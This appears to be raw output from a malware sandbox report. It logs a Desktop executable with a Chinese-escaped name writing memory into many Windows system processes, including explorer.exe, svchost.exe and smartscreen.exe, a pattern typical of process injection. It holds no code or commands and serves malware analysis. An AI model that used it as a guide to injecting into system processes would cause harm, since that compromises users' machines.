        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 450000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 850000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B790000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 340000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 680000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 460000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B7A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 350000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 690000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 600000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 470000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B7B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 360000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 910000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 610000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 480000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 960000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 880000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: DD50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 370000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1000000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 620000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 600000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: DC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 490000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 970000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: DD60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 380000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1010000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 240000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 630000Jump to behavior
